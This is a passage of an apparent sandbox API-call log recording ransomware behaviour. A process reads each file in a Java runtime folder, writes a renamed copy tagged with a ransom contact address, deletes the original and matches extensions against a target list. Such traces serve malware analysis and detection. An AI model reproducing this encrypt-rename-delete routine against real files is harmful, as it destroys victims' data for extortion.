(lpString="j2pcsc.dll") returned 10 [0196.395] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pcsc.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\j2pcsc.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0196.396] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=19008) returned 1 [0196.396] CloseHandle (hObject=0x3a8) returned 1 [0196.396] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pcsc.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\j2pcsc.dll")) returned 0x20 [0196.396] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pcsc.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\j2pcsc.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0196.396] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pcsc.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\j2pcsc.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0196.396] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.396] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.396] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pcsc.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\j2pcsc.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x35c [0196.397] GetLastError () returned 0x0 [0196.397] ReadFile (in: hFile=0x3a8, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x4a40, lpOverlapped=0x0) returned 1 [0196.541] WriteFile (in: hFile=0x35c, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0x4a50, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0x4a50, lpOverlapped=0x0) returned 1 [0196.542] ReadFile (in: hFile=0x3a8, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.542] WriteFile (in: hFile=0x35c, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0xe8, lpOverlapped=0x0) returned 1 [0196.542] SetEndOfFile (hFile=0x35c) returned 1 [0196.542] CloseHandle (hObject=0x35c) returned 1 [0196.542] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.542] SetEndOfFile (hFile=0x3a8) returned 1 [0196.543] CloseHandle (hObject=0x3a8) returned 1 [0196.543] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pcsc.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0196.544] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pcsc.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\j2pcsc.dll")) returned 1 [0196.544] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pcsc.dll") returned 49 [0196.544] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pcsc.dll") returned 49 [0196.544] lstrlenW (lpString=".doc") returned 4 [0196.544] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0196.544] lstrlenW (lpString=".docx") returned 5 [0196.544] lstrcmpiW (lpString1=".docx", lpString2="c.dll") returned -1 [0196.544] lstrlenW (lpString=".pdf") returned 4 [0196.544] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0196.544] lstrlenW (lpString=".xls") returned 4 [0196.544] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0196.544] lstrlenW (lpString=".xlsx") returned 5 [0196.544] lstrcmpiW (lpString1=".xlsx", lpString2="c.dll") returned -1 [0196.544] lstrlenW (lpString=".ppt") returned 4 [0196.544] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0196.545] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pcsc.dll") returned 49 [0196.545] lstrlenW (lpString=".zip") returned 4 [0196.545] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0196.545] lstrlenW (lpString=".rar") returned 4 [0196.545] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0196.545] lstrlenW (lpString=".bz2") returned 4 [0196.545] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0196.545] lstrlenW (lpString=".7z") returned 3 [0196.545] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0196.545] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pcsc.dll") returned 49 [0196.545] lstrlenW (lpString=".dbf") returned 4 [0196.545] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0196.545] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pcsc.dll") returned 49 [0196.545] lstrlenW (lpString=".1cd") returned 4 [0196.545] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0196.545] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pcsc.dll") returned 49 [0196.545] lstrlenW (lpString=".jpg") returned 4 [0196.545] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0196.545] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pcsc.dll") returned 49 [0196.545] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pcsc.dll") returned 49 [0196.545] lstrlenW (lpString=".doc") returned 4 [0196.545] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0196.545] lstrlenW (lpString=".docx") returned 5 [0196.545] lstrcmpiW (lpString1=".docx", lpString2="c.dll") returned -1 [0196.545] lstrlenW (lpString=".pdf") returned 4 [0196.545] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0196.545] lstrlenW (lpString=".xls") returned 4 [0196.545] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0196.546] lstrlenW (lpString=".xlsx") returned 5 [0196.546] lstrcmpiW (lpString1=".xlsx", lpString2="c.dll") returned -1 [0196.546] lstrlenW (lpString=".ppt") returned 4 [0196.546] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0196.546] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pcsc.dll") returned 49 [0196.546] lstrlenW (lpString=".zip") returned 4 [0196.546] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0196.546] lstrlenW (lpString=".rar") returned 4 [0196.546] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0196.546] lstrlenW (lpString=".bz2") returned 4 [0196.546] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0196.546] lstrlenW (lpString=".7z") returned 3 [0196.546] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0196.546] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pcsc.dll") returned 49 [0196.546] lstrlenW (lpString=".dbf") returned 4 [0196.546] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0196.546] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pcsc.dll") returned 49 [0196.546] lstrlenW (lpString=".1cd") returned 4 [0196.546] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0196.546] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pcsc.dll") returned 49 [0196.546] lstrlenW (lpString=".jpg") returned 4 [0196.546] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0196.546] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0196.546] lstrlenW (lpString="jaas_nt.dll") returned 11 [0196.547] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jaas_nt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jaas_nt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0196.547] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=21056) returned 1 [0196.547] CloseHandle (hObject=0x3a8) returned 1 [0196.547] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jaas_nt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jaas_nt.dll")) returned 0x20 [0196.547] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jaas_nt.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jaas_nt.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0196.547] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jaas_nt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jaas_nt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0196.547] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.547] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.547] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jaas_nt.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jaas_nt.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x35c [0196.548] GetLastError () returned 0x0 [0196.548] ReadFile (in: hFile=0x3a8, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x5240, lpOverlapped=0x0) returned 1 [0196.639] WriteFile (in: hFile=0x35c, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0x5250, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0x5250, lpOverlapped=0x0) returned 1 [0196.640] ReadFile (in: hFile=0x3a8, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.640] WriteFile (in: hFile=0x35c, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0xea, lpOverlapped=0x0) returned 1 [0196.641] SetEndOfFile (hFile=0x35c) returned 1 [0196.787] CloseHandle (hObject=0x35c) returned 1 [0196.787] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.787] SetEndOfFile (hFile=0x3a8) returned 1 [0196.788] CloseHandle (hObject=0x3a8) returned 1 [0196.788] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jaas_nt.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0196.860] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jaas_nt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jaas_nt.dll")) returned 1 [0196.860] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jaas_nt.dll") returned 50 [0196.860] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jaas_nt.dll") returned 50 [0196.860] lstrlenW (lpString=".doc") returned 4 [0196.860] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0196.860] lstrlenW (lpString=".docx") returned 5 [0196.860] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0196.860] lstrlenW (lpString=".pdf") returned 4 [0196.860] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0196.860] lstrlenW (lpString=".xls") returned 4 [0196.860] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0196.861] lstrlenW (lpString=".xlsx") returned 5 [0196.861] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0196.861] lstrlenW (lpString=".ppt") returned 4 [0196.861] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0196.861] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jaas_nt.dll") returned 50 [0196.861] lstrlenW (lpString=".zip") returned 4 [0196.861] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0196.861] lstrlenW (lpString=".rar") returned 4 [0196.861] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0196.861] lstrlenW (lpString=".bz2") returned 4 [0196.861] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0196.861] lstrlenW (lpString=".7z") returned 3 [0196.861] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0196.861] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jaas_nt.dll") returned 50 [0196.861] lstrlenW (lpString=".dbf") returned 4 [0196.861] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0196.861] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jaas_nt.dll") returned 50 [0196.861] lstrlenW (lpString=".1cd") returned 4 [0196.861] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0196.861] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jaas_nt.dll") returned 50 [0196.861] lstrlenW (lpString=".jpg") returned 4 [0196.861] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0196.861] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jaas_nt.dll") returned 50 [0196.861] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jaas_nt.dll") returned 50 [0196.861] lstrlenW (lpString=".doc") returned 4 [0196.861] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0196.861] lstrlenW (lpString=".docx") returned 5 [0196.861] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0196.861] lstrlenW (lpString=".pdf") returned 4 [0196.862] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0196.862] lstrlenW (lpString=".xls") returned 4 [0196.862] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0196.862] lstrlenW (lpString=".xlsx") returned 5 [0196.862] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0196.862] lstrlenW (lpString=".ppt") returned 4 [0196.862] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0196.862] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jaas_nt.dll") returned 50 [0196.862] lstrlenW (lpString=".zip") returned 4 [0196.862] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0196.862] lstrlenW (lpString=".rar") returned 4 [0196.862] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0196.862] lstrlenW (lpString=".bz2") returned 4 [0196.862] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0196.862] lstrlenW (lpString=".7z") returned 3 [0196.862] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0196.862] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jaas_nt.dll") returned 50 [0196.862] lstrlenW (lpString=".dbf") returned 4 [0196.862] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0196.862] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jaas_nt.dll") returned 50 [0196.862] lstrlenW (lpString=".1cd") returned 4 [0196.862] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0196.862] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jaas_nt.dll") returned 50 [0196.862] lstrlenW (lpString=".jpg") returned 4 [0196.863] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0196.863] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0196.863] lstrlenW (lpString="JavaAccessBridge-64.dll") returned 23 [0196.863] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JavaAccessBridge-64.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javaaccessbridge-64.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0196.863] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=142400) returned 1 [0196.863] CloseHandle (hObject=0x38c) returned 1 [0196.863] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JavaAccessBridge-64.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javaaccessbridge-64.dll")) returned 0x20 [0196.863] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JavaAccessBridge-64.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javaaccessbridge-64.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0196.864] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JavaAccessBridge-64.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javaaccessbridge-64.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0196.864] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.864] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.864] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JavaAccessBridge-64.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javaaccessbridge-64.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0196.864] GetLastError () returned 0x0 [0196.864] ReadFile (in: hFile=0x38c, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x22c40, lpOverlapped=0x0) returned 1 [0196.942] WriteFile (in: hFile=0x39c, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0x22c50, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0x22c50, lpOverlapped=0x0) returned 1 [0196.945] ReadFile (in: hFile=0x38c, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.946] WriteFile (in: hFile=0x39c, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0x102, lpOverlapped=0x0) returned 1 [0196.946] SetEndOfFile (hFile=0x39c) returned 1 [0196.946] CloseHandle (hObject=0x39c) returned 1 [0196.946] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.946] SetEndOfFile (hFile=0x38c) returned 1 [0196.948] CloseHandle (hObject=0x38c) returned 1 [0196.948] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JavaAccessBridge-64.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0196.948] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JavaAccessBridge-64.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javaaccessbridge-64.dll")) returned 1 [0196.948] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JavaAccessBridge-64.dll") returned 62 [0196.948] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JavaAccessBridge-64.dll") returned 62 [0196.948] lstrlenW (lpString=".doc") returned 4 [0196.949] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0196.949] lstrlenW (lpString=".docx") returned 5 [0196.949] lstrcmpiW (lpString1=".docx", lpString2="4.dll") returned -1 [0196.949] lstrlenW (lpString=".pdf") returned 4 [0196.949] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0196.949] lstrlenW (lpString=".xls") returned 4 [0196.949] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0196.949] lstrlenW (lpString=".xlsx") returned 5 [0196.949] lstrcmpiW (lpString1=".xlsx", lpString2="4.dll") returned -1 [0196.949] lstrlenW (lpString=".ppt") returned 4 [0196.949] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0196.949] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JavaAccessBridge-64.dll") returned 62 [0196.949] lstrlenW (lpString=".zip") returned 4 [0196.949] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0196.949] lstrlenW (lpString=".rar") returned 4 [0196.949] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0196.949] lstrlenW (lpString=".bz2") returned 4 [0196.949] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0196.949] lstrlenW (lpString=".7z") returned 3 [0196.949] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0196.949] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JavaAccessBridge-64.dll") returned 62 [0196.949] lstrlenW (lpString=".dbf") returned 4 [0196.949] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0196.949] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JavaAccessBridge-64.dll") returned 62 [0196.949] lstrlenW (lpString=".1cd") returned 4 [0196.949] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0196.949] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JavaAccessBridge-64.dll") returned 62 [0196.949] lstrlenW (lpString=".jpg") returned 4 [0196.949] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0196.950] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JavaAccessBridge-64.dll") returned 62 [0196.950] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JavaAccessBridge-64.dll") returned 62 [0196.950] lstrlenW (lpString=".doc") returned 4 [0196.950] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0196.950] lstrlenW (lpString=".docx") returned 5 [0196.950] lstrcmpiW (lpString1=".docx", lpString2="4.dll") returned -1 [0196.950] lstrlenW (lpString=".pdf") returned 4 [0196.950] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0196.950] lstrlenW (lpString=".xls") returned 4 [0196.950] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0196.950] lstrlenW (lpString=".xlsx") returned 5 [0196.950] lstrcmpiW (lpString1=".xlsx", lpString2="4.dll") returned -1 [0196.950] lstrlenW (lpString=".ppt") returned 4 [0196.950] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0196.950] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JavaAccessBridge-64.dll") returned 62 [0196.950] lstrlenW (lpString=".zip") returned 4 [0196.950] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0196.950] lstrlenW (lpString=".rar") returned 4 [0196.950] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0196.950] lstrlenW (lpString=".bz2") returned 4 [0196.950] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0196.950] lstrlenW (lpString=".7z") returned 3 [0196.950] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0196.950] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JavaAccessBridge-64.dll") returned 62 [0196.950] lstrlenW (lpString=".dbf") returned 4 [0196.950] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0196.950] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JavaAccessBridge-64.dll") returned 62 [0196.950] lstrlenW (lpString=".1cd") returned 4 [0196.950] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0196.950] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JavaAccessBridge-64.dll") returned 62 [0196.951] lstrlenW (lpString=".jpg") returned 4 [0196.951] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0196.951] lstrcmpiW (lpString1=".exe", lpString2=".bat") returned 1 [0196.951] lstrlenW (lpString="javaw.exe") returned 9 [0196.951] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaw.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javaw.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0196.951] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=206912) returned 1 [0196.951] CloseHandle (hObject=0x38c) returned 1 [0196.951] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaw.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javaw.exe")) returned 0x20 [0196.952] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaw.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javaw.exe.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0196.952] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaw.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javaw.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 